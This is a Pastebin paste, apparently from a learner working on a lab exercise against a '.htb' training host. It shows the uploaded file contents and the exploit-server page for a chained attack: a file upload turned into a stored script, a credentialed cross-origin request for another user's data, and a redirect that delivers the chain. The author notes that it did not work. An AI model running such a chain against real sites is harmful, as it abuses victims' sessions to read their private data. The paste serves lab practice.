API tools faq
paste
Guest User

Untitled

a guest
Feb 26th, 2025
143
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.93 KB | None | 0 0
raw download clone embed print report
  1. ///// Payload uploaded to the payload.txt file (file_id=1)
  2. /////
  3. [...]
  4. Content-Disposition: form-data; name="fileToUpload"; filename="payload.txt"
  5. Content-Type: text/html
  6.  
  7. var xhr = new XMLHttpRequest();
  8. xhr.open('GET', 'https://vulnerablesite.htb/users.php?userid=3', false);
  9. xhr.withCredentials = true;
  10. xhr.send();
  11. [...]
  12.  
  13.  
  14.  
  15. ///// Payload uploaded to the exploit.txt file (file_id=2)
  16. ////
  17. [...]
  18. Content-Disposition: form-data; name="fileToUpload"; filename="exploit.txt"
  19. Content-Type: text/html
  20.  
  21. <!DOCTYPE html>
  22. <html lang="en">
  23. <head>
  24. </head>
  25. <body>
  26. <script src="/display_file.php?file_id=1"></script>
  27. </body>
  28. </html>
  29. [...]
  30.  
  31.  
  32.  
  33. ///// Payload at exploitserver/exploit
  34. ////
  35. <script>
  36. document.location = "https://vulnerablesite.htb/index.php?next=/display_file.php?file_id=2";
  37. </script>
  38.  
  39.  
  40. ///// As a last step I'm just hitting 'Deliver to Victim' however with no result.
  41. /////
  42.  
  43.  
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!